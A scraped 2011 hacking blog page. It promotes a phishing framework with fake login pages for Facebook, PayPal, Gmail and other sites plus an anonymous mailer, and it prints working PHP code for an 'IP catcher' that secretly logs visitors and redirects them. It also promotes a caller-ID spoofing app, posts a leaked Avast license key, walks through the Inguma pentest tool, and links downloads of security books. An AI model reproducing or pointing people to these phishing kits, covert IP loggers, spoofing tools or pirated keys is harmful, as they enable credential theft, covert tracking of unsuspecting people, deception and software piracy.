border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Friday, October 28, 2011

Windows 8 UX Pack 3.5



Windows 8 UX Pack will theme your Windows 7 desktop with the latest available Windows 8 User Experience. 8UXP includes Windows 8 Login Screen, Themes, Wallpapers, UserTile and much more.


Features:


M3 user interface for installation/configuration
One-click installation/configuration
UxStyle memory patching
Windows 8 Aero Glass or Lite theme
Instant M2 and M3 wallpaper/logon screen customization
UserTile with current user/wallpaper auto configured on login
What's New in version 3.5:
Added ability to offer uninstalling existing UX Pack product if can be uninstalled from Control Panel
Corrected logon screen wallpaper items as Developer Preview ones is actually lock screen
Replaced ViOrb with Kishan Bagaria's Windows 7 Start Orb Changer including authentic orb from Windows 8 resources
Updated Default Windows Aero theme to dj-corny's Windows 8 Metro Mod 1.66
Updated Newgen background to be properly matched with Windows 8 Metro Start
Updated User Tile's default configuration to be unchecked as Windows 8 Developer Preview no longer has it.


DOWNLOAD

Saturday, October 22, 2011

CRAZY CALL SPOOFING


Crazy Call is the ultimate tool for making prank calls and fooling your friends.
You can change your CallerID, so when you call someone he sees on his Caller ID display the number you selected.You can also change the pitch of your voice for deep and creepy or high and funny.



To use the app, your phone will dial to an International or premium rate number. The call rate vary depending on your carriers charges.


You can check the rates and use the app from any phone at Click Here
The app is not working in the USA because of the Truth in Caller ID Act.

Download its application for Android  Download 1.2 : Official


Social Engineering Ninja – PHP v 0.4 PHISHING FRAMEWORK



Social-Engineering Ninja is a Social Engineering tool, with 20-25 popular sites fake pages and anonymous mailer via mail() function in PHP.



Sites included:


amazon.com
digg.com
ebuddy.com
facebook.com
gmail.com
hotmail.com
msn.com (hotmail)
myspace.com
onecard.com (AR,EN Langs)
paypal.com
travian.com (AR,EN Langs)
twitter.com
yahoo.com
youtube.com
xboxlive.com
hotfile.com


features:


popular phishing pages
IP catcher with redirection
Public browser exploitation
Anonymous email sender


Download Social-Engineering Ninja V0.4 (SEN-V0.4.rar)

You Can See You Tube Video Here 


Making your own ip catcher



This will get the ip of the user that goes to your page. The log will be saved in the same map as ip_log.txt. The user will be redirected to (in this case) Google



Code:


<?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("ip_log.txt","a");  //ip_log.txt = Where it needs to save to. Here it must be hosted in same map !
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);
header( 'Location: http://www.google.com' ) ; //www.google.com = Site where it needs to redirected to
?>


Download Code here

Inguma Penetration Testing And Vulnerability Research Toolkit



This documents aims to provide a fast introduction to Inguma PyGtk GUI and guide new users on the initial fast steps to perform a basic test agains one target. It will not be a complete guide of all Inguma's features.
First we need to run ginguma.py as root or administrator user so all modules could be launched.
user@laptop:~/Inguma$ sudo ./ginguma.py 
[sudo] password for user: 
Checking: 
        GTK UI dependencies...  OK 
WARNING: No route found for IPv6 destination :: (no default route?) 
        Scapy...                OK 
        Network conectivity...  OK 
        GtkSourceView2...       OK 
        VTE Terminal...         OK 
        /usr/bin/nmap...        OK 
        /pentest/web/w3af/w3af_console...       OK 
Starting Inguma, running on: 
  Python version: 
    2.6.4 (r264:75706, Dec  7 2009, 18:45:15) 
    [GCC 4.4.1] 
  GTK version: 2.18.3 
  PyGTK version: 2.16.0 
Once the aplication finishes loading there are two main paths to follow in order to start working:
Manually launch the desired modules one by one: discovers->ipaddr, dicovers-> tcptrace, etc...
Use the “Add Target” button so the first non intrusive probes will be done automatically.
We will use the second one. So press the “Add Target” button and a new dialog will appear. Select “domain”, fill the text input with the name of your target like “testphp.acunetix.com”, don't select “Use Nmap” as we want to use Inguma's own modules, and press “Accept”.


For each of the modules launched a new "output dialog" will apperar containing the module output, also at the bottom of the application, the“Actions” tab will have a new entry for each executed module.


Once all modules finish to execute, some new data will be added in the two main information areas of the GUI: the map and the data tree.
On the tree a new node will appear for the new target containing all the information gathered. If you want to see all it at the same time, press the button “Show Log” at the top toolbar to hide the log window.
The main window is dominated by the network map, press the button “Show KB” to hide also the side pannel and give more space to the map. Actually the map shows network trace to the target and we can have it also clustered by ASN information if we right-click on a blank part of the map and press “Get ASN” option:



After finished, if you recover bottom pannel with the “Show Log” button, change to the “Logs” tab so you can see this module output.



Now the map offers information about the nodes between our network and the target and the networks we cross in every comunication. The toolbar at the right of the map offers options to modify map “Zoom” (first four buttons) and “Orientation” (next four ones with arrow icons).
The last one is helpful in situations were you have many distant targets and you are not interested in intermediate nodes, by pressing it the graph will fold those nodes to allow faster access to targets.



This map has two different contextual menus that popup on right clicking a node or a blank portion of the graph.
The node's menu offers many node's information and also classified modules that can be launched against this node.
The graph menu goups actions that affect the whole graph, like the “Get ASN” we already used, and different graphs that show the Knowledge Base (KB) information in different manners.
Step-XX.png
Let's advance with a portscan probe against our target. For this we will use “nmapscan” module. On ginguma's startup one of the dependency checks looked for nmap presence. If the check was ok right click on target node (in red) and go to “Gathers->Scanners->nmapscan”:



This new dialog offers many scan profiles already prepared and the option to customize your scan by manually feeding the command text entry. If you don't remember any Nmap option just press the “Help” button.

Wait until scan finishes and then let's see what has changed. Now we can see scan results on the normal popup dialog. Also KB Tree and map have been updated with new information regarding open ports, services found and Operative system.


On the targte's node at the map we can see now OS infromation directly and the new information on the node's menu:



The "Services" submenu groups information and actions for each one of the open ports found. Information like port number or service detectedand actions like open in a browser (for HTTP related ports) or in terminal (telnet or console like servces). Also brute force modules are offered here.
As we found an HTTP server on port 80 of this target, let's do some basic vulnerability assesment of the service using the nikto module. First, let's update the nikto rules database by pressing the “Properties” button on the top toolbar, going to “Update” tab and pressing the update button for the “Nikto Rules”.



As always, once finished a module output dialog will popup with the output information. So we now have the rules updated and all we need is to popup the target's menu and go to “Gathers->web->nikto” module.
A small dialog will ask for the module required information: Target IP already filled, set Port to 80 and Timeout to 2. Press "Accept" and wait for some time as more that 3000 checks take long to complete... ;-)



As new vulnerabilities are found, they are added to the module output dialog:



Once finished a summary of the results will be added to the dialog and more data to the KB tree, of course:



And more important, the node menu has a new submenu under port 80 with all the vulnerabilities found , just by clicking on each of them, they will be opened on the browser.


False positives are as common as with the real nikto ;-)
Now that we collected more information regarding the target and it's services we can start exploring other graphs by using the graph's context menu.
On those other graphs you can see relations between IP, ports, vulnerabilites, etc... feel free to explore.



Now let's search for exploits for the OpenSSH version we identified on port 22. First we need to download, or update, the exploits so let'g go back to the “Properties” dialog, “Update” tab and press the “Update” button for Exploit DB. Before downloading the exploits, switch thebottom pannel to “Logs” tab to folow the actions performed. This will take some time and make you Hard drive work as there are many exploits to unpack:


Once finished we can go to the “Exploit” tab on the left of the main window where we will be able to manage them. Exploits need some seconds to load.
Once loaded we can fill the “Text to search” entry with the version of OpenSSH we found and press the “Search” button:



To study one exploit in more detail just right click on it and the inguma's editor will popup with the code of the selected exploit:


Actually we didn't found an exploit for this version but we can also search for the HTTP server, the OS, etc... if happen that we find a working one, just look at the path column, create a new terminal by pressing the “New Tab” button at the “Term” tab at the left of the main window, and go to this path to execute the exploit.


Automation of this search by adding an option on the node's menu is work in progress, as is to open the terminal in the adecuate directory on double clicking one exploit.
Finally press “Save” button at the top toolbar if you want to save the actual work for the future.
There is much more that inguma has to offer but for knowing all the details you will have to read the whole documentation.


Wednesday, October 19, 2011

Avast 6.0 License Activation Key Valid Until 2038


Leaked Valid License Key Code to Activate Avast 6.0 Antivirus until 2038 – Looking for a comprehensive antivirus utility for your Windows PC or Laptop? Then you should try Avast anti-virus app. Avast is a powerful antivirus software works on Windows PC or Computer. There are about thousands users trusted their computer security to Avast.


What;s so good about Avast or why we have to choose Avast? AV-Comparatives.org rated avast! antivirus as the fastest solution for Windows. New version 6.0 of Avast brings even stronger technologies, in an even smaller package.


I’m sure after you’ve tested Avast, you’ll never regret and you’ll even more curious on how to use Avast until few weeks or even few months next. Just FYI: avast! antivirus products are available to download for a free 30-day trial period. But luckily, you can simply use this leaked serial key code to unlock and activate Avast antivirus for usage until 2038. Wow..that’s a very long time usage.


Curious? Then quickly download Avast 6.0 and use following activation key code which is valid until 2038. However if you don’t get as fast as possible, Avast may block this leaked serial number (key code). The license key is valid to activate Avast v4.8, Avast 5, and Avast 6.0.
Note: For non-commercial usage only of Avast Free Edition. Trust me you should try this key...
Leaked Avast Key Code:


Note: For non-commercial usage only of Avast Free Edition. Trust me you should try this key...
Leaked Avast Key Code: W6754380R9978A0910-4TZ59467

Saturday, October 8, 2011

BackTrack 5 Wireless Penetration Testing Beginner’s Manual Guide


Wireless has turn into ubiquitous in today’s world. The mobility and flexibility provided by it tends to make our lives a lot more comfortable and effective. But this arrives at a expense – Wireless technologies are inherently insecure and can be simply broken. BackTrack is a penetration screening and safety auditing distribution that comes with a myriad of wireless networking resources utilized to simulate network attacks and detect safety loopholes.
Backtrack five Wireless Penetration Testing Beginner’s Guidebook will take you through the journey of turning out to be a Wireless hacker. You will find out several wireless screening methodologies taught utilizing reside examples, which you will put into practice all the way through this book. The engaging functional periods really gradually develop in complexity giving you enough time to ramp up ahead of you get to advanced wireless attacks.
This ebook will consider you via the simple ideas in Wireless and making a lab surroundings for your experiments to the enterprise of diverse lab periods in wireless protection fundamentals, gradually flip on the warmth and transfer to far more complicated scenarios, and finally finish your journey by conducting bleeding edge wireless attacks in your lab.
There are several interesting and new items that you will understand in this e-book – War Driving, WLAN packet sniffing, Network Scanning, Circumventing hidden SSIDs and MAC filters, bypassing Shared Authentication, Cracking WEP and WPA/WPA2 encryption, Access Level MAC spoofing, Rogue Devices, Evil Twins, Denial of Support attacks, Viral SSIDs, Honeypot and Hotspot attacks, Caffe Latte WEP Assault, Guy-in-the-Center attacks, Evading Wireless Intrusion Prevention programs and a bunch of other reducing edge wireless attacks.
If you have been ever before curious about what wireless protection and hacking was all about, then this guide will get you began by supplying you with the knowledge and practical know-how to become a wireless hacker.
Hands-on useful guide with a step-by-action approach to help you get started out right away with Wireless Penetration Testing
What you will discover from this ebook :
-Create a Wireless Lab for conducting experiments
-Check the air and sniff wireless packets
-Bypass WLAN authentication mechanism
-Crack WEP/WPA/WPA2 encryption mechanisms
-Break into a WLAN network employing infrastructure flaws
-Break into a Wireless customer this kind of as a laptop computer
-State-of-the-art attacks this kind of as Guy-in-the-Middle attacks and Evading WIPS
-Carry out wireless penetration test in a methodical way

Monday, October 3, 2011

Unmasked




Anonymous got lucky. When five of its hackers attacked security company HBGary Federal on February 6, 2011, they were doing so in order to defend the group’s privacy. It wasn’t because they hoped to reveal plans to attack WikiLeaks, create surveillance cells targeting pro-union organizations, and sell sophisticated rootkits to the US government for use as offensive cyber weapons but that’s what they found.


In the weeks after the attack, the hackers released tens of thousands of e-mail messages and made headlines around the world. Aaron Bar, the CEO of HBGary Federal, eventually resigned; 12 Congressman called for an investigation; an ethics complaint was lodged against a major DC law firm involved with some of the more dubious plans.


Join Ars' editors as they dig into the secret world of Anonymous and hackers for hire in Unmasked. 


DOWNLOAD

The Shellcoder's Handbook: Discovering and Exploiting Security Holes




This much-anticipated revision, written by the ultimate group of top security experts in the world, features 40 percent new content on how to find security holes in any operating system or application
New material addresses the many new exploitation techniques that have been discovered since the first edition, including attacking "unbreakable" software packages such as McAfee's Entercept, Mac OS X, XP, Office 2003, and Vista
Also features the first-ever published information on exploiting Cisco's IOS, with content that has never before been explored
The companion Web site features downloadable code files
The black hats have kept up with security enhancements. Have you?
In the technological arena, three years is a lifetime. Since the first edition of this book was published in 2004, built-in security measures on compilers and operating systems have become commonplace, but are still far from perfect. Arbitrary-code execution vulnerabilities still allow attackers to run code of their choice on your system—with disastrous results.
In a nutshell, this book is about code and data and what happens when the two become confused. You'll work with the basic building blocks of security bugs—assembler, source code, the stack, the heap, and so on. You'll experiment, explore, and understand the systems you're running and how to better protect them.
Become familiar with security holes in Windows, Linux, Solaris, Mac OS X, and Cisco's IOS
Learn how to write customized tools to protect your systems, not just how to use ready-made ones
Use a working exploit to verify your assessment when auditing a network
Use proof-of-concept exploits to rate the significance of bugs in software you're developing
Assess the quality of purchased security products by performing penetration tests based on the information in this book
Understand how bugs are found and how exploits work at the lowest level


DOWN LOAD

Sunday, October 2, 2011

Metasploit – The Penetration Tester’s Guide





"The best guide to the Metasploit Framework." ?HD Moore, Founder of the Metasploit Project



The Metasploit Framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. But while Metasploit is used by security professionals everywhere, the tool can be hard to grasp for first-time users. Metasploit: The Penetration Tester's Guide fills this gap by teaching you how to harness the Framework and interact with the vibrant community of Metasploit contributors.

Once you've built your foundation for penetration testing, you'll learn the Framework's conventions, interfaces, and module system as you launch simulated attacks. You'll move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, wireless attacks, and targeted social-engineering attacks.

Learn how to:

Find and exploit unmaintained, misconfigured, and unpatched systems
Perform reconnaissance and find valuable information about your target
Bypass anti-virus technologies and circumvent security controls
Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
Use the Meterpreter shell to launch further attacks from inside the network
Harness standalone Metasploit utilities, third-party tools, and plug-ins
Learn how to write your own Meterpreter post exploitation modules and scripts

You'll even touch on exploit discovery for zero-day research, write a fuzzer, port existing exploits into the Framework, and learn how to cover your tracks. Whether your goal is to secure your own networks or to put someone else's to the test, Metasploit: The Penetration Tester's Guide will take you there and beyond.


Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More